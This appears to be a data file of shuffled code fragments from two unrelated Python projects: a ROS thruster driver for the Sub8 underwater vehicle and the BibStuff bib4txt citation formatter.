"self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0)",
"msg): ''' Callback for receiving thrust commands These messages contain a list of",
"5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue",
"service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus,",
"get_estimate methods are left for when smarter filtering is needed ''' VMAX =",
"Given a command message, route that command to the appropriate port/thruster - Send",
"has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def",
"it will raise and alarm ''' failed_before = {x for x in self.failed_thrusters}",
"'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a",
"effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__':",
"if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage:",
"as np import copy import rospy import rospkg import rosparam import threading import",
"BLR, FLH, etc. Raises RuntimeError if a thrust value outside of the configured",
"> thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format(",
"'/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is",
"time)) self.prune_buffer() # check bus voltage if enough time has passed if rospy.Time.now()",
"mapper blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)",
"deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock)",
"thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count',",
"not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back",
"ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates",
"float (amount of seconds for which to keep a reading in the buffer)",
"# check bus voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time",
"''' Issue a a force command (in Newtons) to a named thruster Example",
"Gather configuration data and make it available to other nodes - Instantiate ThrusterPorts,",
"self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates the",
"def __init__(self, window_duration): ''' window_duration - float (amount of seconds for which to",
"self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a",
"in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed)",
"Prevent outside interference # Create ThrusterPort objects in a dict indexed by port",
"outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if",
"self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a",
"filtering is needed ''' VMAX = 50 # volts VMIN = 0 #",
"get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going",
"Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb,",
"for a particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info",
"Add the thrusters to the thruster dict and configure if present for thruster_name",
"real), for communicating with thrusters - Track a thrust_dict, which maps thruster names",
"<< 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 <<",
"in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware",
"in self.thruster_to_port_map.keys()} # These alarms require this service to be available before things",
"true - David) if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0):",
"containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver')",
"# This is only determined by comms self.deactivated_thrusters = set() # These will",
"sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import",
"for commanding all of the sub's thrusters - Gather configuration data and make",
"IOError('/thruster_layout rosparam needs to be set before launching the thruster driver') thruster_driver =",
"in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for"
] |
[
"ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list of",
"list. To do so need: - the keys for the citations referenced -",
"#second: create CiteRefProcessor object to process cites during src parsing # (and associate",
"= ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create",
"the bibliography\"\"\" #first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation",
"create object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse",
"result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings =",
"dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen",
"2.6 dependencies: with :TODO: address the TODOs in the associate BibStuff files, especially",
"exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open",
"include this in your reST document with an ``include`` directive. How it works:",
"workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default:",
"argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s",
"Outputs a sorted list of citation definitions, to be used in the References",
"a script # style # bibfile_processor # note that the standard separator for",
"found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for",
"result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for",
"this case, the reference list is added to the end of the file.",
"a comma # CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser,",
"overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\",",
"open output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not",
"bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys",
"for the citations referenced - a sort-key on which to base the sorting",
"bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file",
"(see `license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py,",
"intext citations and the bibliography\"\"\" #first: create a citation manager to handle the",
"citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27",
"print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False,",
"open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse:",
"bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read",
"args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) #",
"if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\":",
"citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during",
"= args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a",
"is also associated with citation_manager which holds the bibliography, so we can make",
"have if you have this) The source text file should include citation references",
"the TODOs in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html",
"help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for",
"permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized",
"input and output _infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser",
"-i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__)",
"parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result =",
"(without using LaTeX or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse",
"the References section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright:",
"if desired if not citations_only: result = cite_processor.__repr__() + result return result+'\\n' #",
"filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \"",
"action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write",
"appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append(",
"error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s",
"default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print",
"holds the cite keys. It is also associated with citation_manager which holds the",
"enclosed in brackets, followed by an underscore. Citation keys cannot be all digits.",
"already exists: Use -n option to nuke (overwrite) this file. PLEASE CHECK FILE",
"style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {}",
"(default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = \"\"\"ABORTED because",
"is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008)",
"bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2 exec vs Python",
"based on `stylefile` command-line option #TODO: add error handling for unknown styles style",
"\"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\",",
"- a sort-key on which to base the sorting :note: Sorting is style",
"GLOBALS ################################################## # some globals are set when this file is run as",
"user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir)",
"keys cannot be all digits. The source document can be output with formatted",
"taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It",
"to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.')",
"include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in",
"bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set",
"__docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ##################################################",
"followed by an underscore. Citation keys cannot be all digits. The source document",
"user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages",
"we can make a sorted entry list. To do so need: - the",
"bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s",
"def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\":",
"a sorted list of citation definitions, to be used in the References section",
"\"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from",
"os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local",
"citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if desired if not",
"styles with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if",
"_outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options]",
"your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license:",
"parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\",",
"of citation definitions, to be used in the References section of your documents.",
"in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser,",
"bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## #",
"bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set when this",
"elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently",
"2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended",
"create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager =",
"__version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library",
"files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt",
"a citation key enclosed in brackets, followed by an underscore. Citation keys cannot",
"os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option",
"or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!) -",
"level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\")",
"BibTeX databases found.\") sys.exit(1) # read input file (default: stdin) if args.infile: try:",
"dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\",",
"be written to a separate file. You can then include this in your",
"citation definitions for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly,",
"#work around Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround) style",
"#store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result",
"when this file is run as a script # style # bibfile_processor #",
".. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ =",
"action=\"store\", nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args() if args.logger_level:",
"citation reference is a comma # CITATION_SEP = ',' # set in styles/shared.py",
"references. - Uses SimpleParse_ to convert an EBNF_ grammar into an object for",
"need: - the keys for the citations referenced - a sort-key on which",
"directive. How it works: - Uses SimpleParse_ to convert an EBNF_ grammar into",
"with formatted citation references substituted for the citation keys. In this case, the",
"list is added to the end of the file. A slight modification of",
"works: - Uses SimpleParse_ to convert an EBNF_ grammar into an object for",
"logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff",
"parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\",",
"prepend the entire document, if desired if not citations_only: result = cite_processor.__repr__() +",
"reST document with an ``include`` directive. How it works: - Uses SimpleParse_ to",
"read input file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8')",
"Python 2.6 dependencies: with :TODO: address the TODOs in the associate BibStuff files,",
"= '2.7+' ################### IMPORTS ################################################## #import from standard library import importlib, os, sys",
"and the bibliography\"\"\" #first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create",
"#third: parse the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite",
"parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed",
"processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a",
"messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference",
"\"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE",
"parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args() if",
"help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level",
"bib4txt_logger.info(\"It is currently recommended to pass styles with the -s option.\") stylename =",
"to pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\",",
"#!/usr/bin/env python # bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful",
"now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note:",
"*not* legal reST. The intent is for the formatted references to be written",
"the sorting :note: Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\"",
"output file %s already exists: Use -n option to nuke (overwrite) this file.",
"ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp #",
"the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity:",
"= \"\"\"ABORTED because output file %s already exists: Use -n option to nuke",
"= open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest",
"formatted citation references substituted for the citation keys. In this case, the reference",
"args.overwrite: _msg = \"\"\"ABORTED because output file %s already exists: Use -n option",
"cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file bibfile_processor",
"help=\"2: print DEBUG messages; 1: print INFO messages; default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\",",
"will be recognized by bib4txt. - Comma separted multiple keys are permitted in",
"cite_processor.all_citekeys holds the cite keys. It is also associated with citation_manager which holds",
"= open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names)",
"bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default: stdin) if",
"output _infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage =",
"- Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST",
"manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE)",
"if not citations_only: result = cite_processor.__repr__() + result return result+'\\n' # ds added",
"is added to the end of the file. A slight modification of the",
"permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent",
"an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation",
"pass a style by filename\") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \"",
"style # bibfile_processor # note that the standard separator for multiple keys in",
".bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from the input",
"found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h",
"option #TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec",
"simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError:",
"EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) -",
"= simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file bibfile_processor =",
"file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.')",
"CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, #",
"args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp",
"legal reST. The intent is for the formatted references to be written to",
"_infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\"",
"bibstyles, ebnf_sp except ImportError: #hack to allow user to run without installing scriptdir",
"slight modification of the reStructuredText ``cite`` directive is currently allowed: - Most characters",
"all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions",
"# Create a simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec,",
"bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style,",
"globals are set when this file is run as a script # style",
"with the -s option.\") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\"",
"bib4txt. - Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_``",
"if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the",
"You can then include this in your reST document with an ``include`` directive.",
"\"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\",",
"arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec",
"try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name",
"value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args = parser.parse_args()",
"into an object for scanning reST files for citation references. - Uses SimpleParse_",
"CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names",
"citation_manager which holds the bibliography, so we can make a sorted entry list.",
"multiple keys in one citation reference is a comma # CITATION_SEP = ','",
"= bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a dummy container)",
"TypeError: #Python 2 did not accept encoding arg _infile = open(args.infile, mode='r') except:",
"is for the formatted references to be written to a separate file. You",
"to a separate file. You can then include this in your reST document",
"multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4",
"installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile,",
"with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite",
"dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted",
"associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse",
"be output with formatted citation references substituted for the citation keys. In this",
"bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with",
"args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles with the -s",
"])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based on `stylefile` command-line",
"workaround = {} #work around Python 2 exec vs Python 3 exec exec(str2exec,",
"in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a",
"1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to pass styles",
"for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the",
"bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is",
"#exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout)",
"E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized by",
"file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc)",
"CiteRefProcessor object to process cites during src parsing # (and associate it with",
"text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with keys')",
"an object for scanning reST files for citation references. - Uses SimpleParse_ to",
"document. - Outputs a sorted list of citation definitions, to be used in",
"cite_processor.__repr__() + result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names):",
"to parse bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor)",
"which holds the bibliography, so we can make a sorted entry list. To",
"messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG",
"bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to run without installing",
"style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create a citation",
"the citation definitions for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations()",
"- Outputs a sorted list of citation definitions, to be used in the",
"- Extracts the citation references from the input document. - Outputs a sorted",
"\" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based on",
"a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for",
"to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from",
"bibliography, so we can make a sorted entry list. To do so need:",
"Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff (which you should",
"file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg",
"chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib",
"also associated with citation_manager which holds the bibliography, so we can make a",
"################################################## # some globals are set when this file is run as a",
"formatted references to be written to a separate file. You can then include",
"key enclosed in brackets, followed by an underscore. Citation keys cannot be all",
"import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are",
"# open output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and",
"= ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based",
"This is *not* legal reST. The intent is for the formatted references to",
"running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile, args.outfile, stylename)",
"parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\",",
"output with formatted citation references substituted for the citation keys. In this case,",
"How it works: - Uses SimpleParse_ to convert an EBNF_ grammar into an",
"= workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing",
"import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import",
